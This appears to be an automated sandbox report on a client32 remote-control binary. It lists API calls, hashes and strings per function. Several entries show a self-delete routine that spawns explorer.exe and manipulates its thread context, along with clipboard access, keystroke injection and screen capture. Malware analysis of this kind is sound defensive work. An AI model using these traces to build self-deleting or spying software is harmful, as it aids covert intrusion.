                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection_memset
                                                                              • String ID:
                                                                              • API String ID: 453477542-0
                                                                              • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                              • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                              • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                              • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                              • ExtractIconExA.SHELL32(?,00000000,0008045F,000802D1,00000001), ref: 11145068
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExtractFileIconModuleName
                                                                              • String ID:
                                                                              • API String ID: 3911389742-0
                                                                              • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                              • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                              • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                              • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                              APIs
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              • __lock_file.LIBCMT ref: 11164CBE
                                                                                • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                              • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                              • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                              • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                              • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 11176045
                                                                                • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                              • __tzset_nolock.LIBCMT ref: 11176056
                                                                                • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1828324828-0
                                                                              • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                              • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                              • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                              • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                              APIs
                                                                                • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                              • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                              • String ID:
                                                                              • API String ID: 3768737497-0
                                                                              • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                              • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                              • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                              • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_
                                                                              • String ID:
                                                                              • API String ID: 3382485803-0
                                                                              • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                              • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                              • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                              • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                              APIs
                                                                              • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                              • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                              • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                              • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: InformationToken
                                                                              • String ID:
                                                                              • API String ID: 4114910276-0
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 328603210-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: __waccess_s
                                                                              • String ID:
                                                                              • API String ID: 4272103461-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: __fsopen
                                                                              • String ID:
                                                                              • API String ID: 3646066109-0
                                                                              APIs
                                                                              • _NSMClient32@8.PCICL32(?,?,?,009510A2,00000000), ref: 0095100B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2968364486.0000000000951000.00000020.00000001.01000000.00000006.sdmp, Offset: 00950000, based on PE: true
                                                                              • API ID: Client32@8
                                                                              • String ID:
                                                                              • API String ID: 433899448-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 11127400
                                                                              • _memset.LIBCMT ref: 1112741D
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                              • _strrchr.LIBCMT ref: 111274AA
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                              • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                              • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                              • wsprintfA.USER32 ref: 11127561
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                              • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                              • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                              • _strrchr.LIBCMT ref: 111276AB
                                                                              • _memmove.LIBCMT ref: 11127724
                                                                              • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                              • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                              • API String ID: 2219718054-800295887
                                                                              APIs
                                                                              • BringWindowToTop.USER32(?), ref: 110242DC
                                                                              • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110242F8
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102430A
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 1102432F
                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 11024361
                                                                              • GetDlgItem.USER32(00000000,00000002), ref: 1102439C
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 110243A5
                                                                              • GetMenu.USER32(?), ref: 11024433
                                                                              • DeleteMenu.USER32(?,00000001,00000400), ref: 1102445B
                                                                              • DrawMenuBar.USER32(?), ref: 1102457C
                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000005), ref: 110245D7
                                                                              • UpdateWindow.USER32(00000000), ref: 11024622
                                                                              • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 11024633
                                                                              • KillTimer.USER32(00000000,?), ref: 1102466C
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • IsIconic.USER32(?), ref: 110245E1
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: Window$Menu$ExitLongProcessTimer$BringDeleteDrawEnableErrorIconicItemKillLastMessageUpdate_strrchrwsprintf
                                                                              • String ID: ..\CTL32\chatexw.cpp$ChatEx$Client$DisableChatSave$DisableJournal$DisableStudentJournal$DisableTutorJournal$RDH:: destroy dialog %x$RDH::Start ChatThread - object %x$RDH::Stop Chat Thread$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1796703375-4211839426
                                                                              • Opcode ID: 78929beebf795930fb9caa717a847736006fca00c9768058545c91b3f72f0481
                                                                              • Instruction ID: c53e1d1d26cb22908c254caa008bdb6232af04d82666ed9524dbf79592a97066
                                                                              • Opcode Fuzzy Hash: 78929beebf795930fb9caa717a847736006fca00c9768058545c91b3f72f0481
                                                                              • Instruction Fuzzy Hash: 1A12B078B40706ABE714DFA5CC81FAEB3A5AF88704F114568F616AB6C5DB70F800CB95
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: #$$$$CLIENTNAME$$$PROMPT$$%03d%s$..\ctl32\Connect.cpp$.prn$op - obuf <= _tsizeof (obuf)
                                                                              • API String ID: 2102423945-3087083064
                                                                              • Opcode ID: efac7ea28bf95b1601145c4618340287db0a216a3f63f558e9b358aedbbfa518
                                                                              • Instruction ID: c06d5b17c2f28b60e10424a9165a7f3540e1b0c8f26497ae356331088a011ef2
                                                                              • Opcode Fuzzy Hash: efac7ea28bf95b1601145c4618340287db0a216a3f63f558e9b358aedbbfa518
                                                                              • Instruction Fuzzy Hash: 26A12B71E0026A5BDB21CF749C917EABBEDEF45308F0441D9E99997240DB32AE45CB90
                                                                              APIs
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 111145D5
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetKeyState.USER32(00000090), ref: 11114600
                                                                                • Part of subcall function 11113190: DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                • Part of subcall function 11113190: keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                              • GetKeyState.USER32(00000014), ref: 1111464C
                                                                              • Sleep.KERNEL32(00000064), ref: 1111466E
                                                                              • GetKeyState.USER32(00000091), ref: 111146A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: State$ControlDeviceMessagePeekSleep__wcstoi64keybd_event
                                                                              • String ID: DisableSyncCapsLock$DisableSyncNumLock$DisableSyncScrollLock$View
                                                                              • API String ID: 1459313812-451981794
                                                                              • Opcode ID: 5f6df4d1873c0af027b22fb262066da309de759a27b2956258f951e3103a83ed
                                                                              • Instruction ID: 124f8e62a6da658c60687918a6121e4bc492e5a03fd0ed5725fd2557b003e167
                                                                              • Opcode Fuzzy Hash: 5f6df4d1873c0af027b22fb262066da309de759a27b2956258f951e3103a83ed
                                                                              • Instruction Fuzzy Hash: 6131D93478074297E320DB34CD45B9AF7E5AB4470CF004829E79A5E6C9EB79B940C79A
                                                                              APIs
                                                                              • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                              • GetClipboardData.USER32(?), ref: 1103337D
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                              • GetLastError.KERNEL32 ref: 11033406
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                              • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                              • API String ID: 1861668072-1296821031
                                                                              • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                              • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                              • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                              • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                              APIs
                                                                              Strings
                                                                              • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                              • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CountIconicTick
                                                                              • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                              • API String ID: 1307367305-2838568823
                                                                              • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                              • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                              • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                              • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                              APIs
                                                                              • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                              • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                              • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                              • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Window$BringCurrentIconicShowThread
                                                                              • String ID:
                                                                              • API String ID: 4184413098-0
                                                                              • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                              • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                              • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                              • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                              APIs
                                                                              • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                              • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ControlDevicekeybd_event
                                                                              • String ID:
                                                                              • API String ID: 1421710848-0
                                                                              • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                              • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Similarity
                                                                              • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                              • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                              • API String ID: 2942389153-3574733319
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,75BF3760,?,75BF7A80), ref: 11128597
                                                                              • GetCurrentProcess.KERNEL32 ref: 11128608
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1112861C
                                                                              • SetLastError.KERNEL32(00000078), ref: 11128636
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1112865C
                                                                              • _memset.LIBCMT ref: 111286BA
                                                                              • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 111286FF
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11128716
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 11128730
                                                                              • CloseHandle.KERNEL32(?), ref: 11128754
                                                                              • CloseHandle.KERNEL32(?), ref: 1112875D
                                                                              • FreeLibrary.KERNEL32(?), ref: 111287AA
                                                                              Similarity
                                                                              • API ID: Process$CloseHandleLibrary$AddressCodeCreateCurrentErrorExitFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                                              • String ID: "$CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrInstallDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
                                                                              • API String ID: 3751713381-2378866903
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                              • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                              • GetDC.USER32(00000000), ref: 110B31E8
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                              • GetTickCount.KERNEL32 ref: 110B323F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                              • GetTickCount.KERNEL32 ref: 110B327F
                                                                              • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                              • GdiFlush.GDI32 ref: 110B32A2
                                                                              • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                              • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                              • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                              • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                              Similarity
                                                                              • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                              • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                              • API String ID: 2071925733-2101319552
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CE21C
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CE247
                                                                              • GetObjectA.GDI32(?,0000003C,?), ref: 110CE269
                                                                              • CreateFontIndirectA.GDI32(?), ref: 110CE29C
                                                                              • GetWindow.USER32(00000000,00000005), ref: 110CE2EE
                                                                              Similarity
                                                                              • API ID: RectWindow$ClientCreateFontIndirectObject
                                                                              • String ID: WM_DPICHANGED, newDpi=%d, oldDpi=%d; newFont=%d, oldFont=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$vector<T> too long
                                                                              • API String ID: 242201110-4090043186
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(00000010), ref: 1100C587
                                                                              • InitializeCriticalSection.KERNEL32(00000028), ref: 1100C58D
                                                                              • InitializeCriticalSection.KERNEL32(00000040), ref: 1100C593
                                                                              • InitializeCriticalSection.KERNEL32(00000058), ref: 1100C599
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1100C5A3
                                                                              • GetVersion.KERNEL32 ref: 1100C6AE
                                                                              • LoadLibraryA.KERNEL32(msacm32.dll), ref: 1100C6BF
                                                                              • GetProcAddress.KERNEL32(00000000,acmStreamOpen), ref: 1100C6DB
                                                                              • GetProcAddress.KERNEL32(?,acmStreamClose), ref: 1100C6EF
                                                                              • GetProcAddress.KERNEL32(?,acmStreamSize), ref: 1100C703
                                                                              • GetProcAddress.KERNEL32(?,acmStreamPrepareHeader), ref: 1100C717
                                                                              • GetProcAddress.KERNEL32(?,acmStreamConvert), ref: 1100C72B
